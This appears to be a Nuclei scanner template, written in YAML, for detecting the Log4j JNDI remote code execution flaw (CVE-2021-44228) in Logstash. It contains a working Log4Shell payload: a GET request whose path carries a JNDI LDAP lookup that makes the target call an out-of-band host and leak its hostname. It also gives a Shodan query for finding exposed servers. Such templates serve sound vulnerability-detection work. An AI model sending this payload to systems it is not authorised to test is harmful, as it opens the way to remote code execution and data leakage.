id: logstash-log4j-rce info: name: Logstash - Remote Code Execution (Apache Log4j) author: shaikhyaser severity: critical description: | Logstash is susceptible to Log4j JNDI remote code execution. Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite "stash." reference: - https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: max-request: 1 shodan-query: html:"logstash" tags: cve,cve2021,rce,jndi,log4j,logstash,oast,kev variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' str: "{{rand_base(5)}}" http: - raw: - | GET /api/logstash/pipeline/${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1 Host: {{Hostname}} Referrer: {{RootURL}}/app/management/ingest/pipelines/ Content-Type: application/json matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request # digest: 4a0a00473045022041e2cc92ba6a2cc9920f7d74806ceb2570f3b0f6f08ac1c3bf26186630e44775022100f7bcae3be77b86e66ecd90c7df6e95093ceffca7167de0844ccc3f4cc28e5ee7:922c64590222798bb761d5b6d8e72950